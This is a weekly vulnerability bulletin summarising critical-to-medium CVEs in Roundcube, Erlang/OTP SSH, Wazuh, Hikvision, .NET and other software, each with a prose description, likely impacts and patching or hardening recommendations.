Here are the CVE updates for the week of June 9th through 15th.
🔴 Critical Severity Vulnerabilities
RoundCube Webmail Cross-Site Scripting Vulnerability (CISA KEV) | CVE-2024-42009
Description:
A Cross-Site Scripting (XSS) vulnerability affects Roundcube Webmail in versions up to 1.5.7 and 1.6.x through 1.6.7. The issue occurs in the message_body() function of show.php, where email content is not properly sanitized. As a result, an attacker can send a crafted email that, when viewed, executes malicious JavaScript in the victim’s session. This type of attack targets the user directly and requires no additional interaction.
Potential Impacts:
- Email Theft: Attackers can read private emails by hijacking the user’s session.
- Session Hijacking: Malicious scripts allow attackers to take control of the victim’s webmail session.
- Privilege Escalation: If the victim has admin access, attackers may take full control of the system.
- Data Exfiltration: Sensitive data could be silently transmitted to an external server controlled by the attacker.
Mitigation Recommendations:
- Upgrade Immediately: Update Roundcube to a version later than 1.5.7 or 1.6.7.
- Escape All Content: Sanitize and escape HTML before rendering any content in the browser.
- Use CSP Headers: Apply strict Content Security Policy headers to block inline script execution.
- Audit Email Logs: Regularly monitor mail logs for abnormal behavior or suspicious emails.
Erlang/OTP SSH Server Critical Authentication Bypass (CISA KEV) | CVE-2025-32433
Description:
A critical flaw in the Erlang/OTP SSH server allows attackers to access sensitive functionality without authentication. Unlike typical exploits, this issue doesn’t require valid credentials. Instead, remote attackers can directly interact with internal functions, which significantly increases the risk of compromise.
Potential Impacts:
- Unauthorized Access: Attackers can perform operations meant for authenticated users.
- Remote Code Execution: They may run commands or scripts on the target system.
- Full Takeover: Exploiting this vulnerability could result in complete system control.
Mitigation Recommendations:
- Apply the Patch Promptly: Install the latest secure version of Erlang/OTP.
- Limit SSH Exposure: Use firewalls or private networks to restrict access.
- Review Access Logs: Identify any irregular SSH activity that may indicate exploitation.
Wazuh Server Remote Code Execution via Deserialization (CISA KEV) | CVE-2025-24016
Description:
Wazuh versions 4.4.0 to 4.9.0 contain a critical remote code execution vulnerability. The issue comes from the as_wazuh_object function, which unsafely deserializes input in the DistributedAPI. An attacker with API access can send a specially crafted request and force the server to execute arbitrary Python code. Attack vectors include compromised dashboards, agents, or cluster nodes.
Potential Impacts:
- Code Execution: Malicious users can execute Python code on the server.
- System Compromise: Attackers can gain full control over the Wazuh instance.
- Lateral Movement: In cluster environments, one compromised node can affect the rest.
- Data Breach: Sensitive logs and configurations may be exposed or altered.
Mitigation Recommendations:
- Update Now: Upgrade to Wazuh version 4.9.1 or later.
- Harden API Access: Restrict it to authenticated users and trusted IP addresses.
- Secure Agent Settings: Ensure endpoint integrity with validated configurations.
- Monitor Activity: Watch for abnormal API calls or unauthorized command executions.
- Isolate Nodes: Use segmentation to prevent movement between cluster components.
🟠 High Severity Vulnerabilities
WebDAV File Path Manipulation Vulnerability (CISA KEV) | CVE-2025-33053
An external file path control vulnerability exists in some WebDAV implementations. Attackers can modify file name or path parameters in requests and execute code on the server. This attack can occur over a network without needing authentication, which makes it especially dangerous in exposed systems.
Remote Command Execution in Hikvision Wireless Access Points | CVE-2025-39240
Hikvision wireless access points are vulnerable to a remote command execution flaw. Attackers who log in with valid credentials can send specially crafted packets that run commands with elevated privileges. Weak input validation enables this behavior.
Acer ControlCenter Code Execution via Named Pipe | CVE-2025-5491
A remote code execution vulnerability affects Acer ControlCenter. Due to misconfigured access control, attackers with low privileges can interact with a Windows Named Pipe and execute arbitrary code with SYSTEM-level permissions.
.NET and Visual Studio Dependency Hijacking | CVE-2025-30399
.NET and Visual Studio are vulnerable to an untrusted search path flaw. When these tools search for dependencies, an attacker can place a malicious file earlier in the path. As a result, the system executes the wrong file. This technique is especially effective over network shares or remote environments.
🟡 Medium Severity Vulnerabilities
Salt Master DoS via Unsanitized File Path | CVE-2025-22242
SaltStack’s Salt Master contains a denial-of-service vulnerability. The pub_ret method accepts unsanitized input, specifically the jid, which it uses to construct a file path. By supplying a reference to an unresponsive or blocking file, such as a pipe in /proc, an attacker can cause the system to hang.
Stored Cross-Site Scripting in AVEVA PI Connector | CVE-2025-4417
AVEVA PI Connector for CygNet (v1.6.14 and earlier) fails to sanitize input in its admin portal. A local administrator can inject persistent JavaScript that runs in the browsers of other users. This XSS attack could lead to stolen credentials, session hijacking, or unauthorized actions.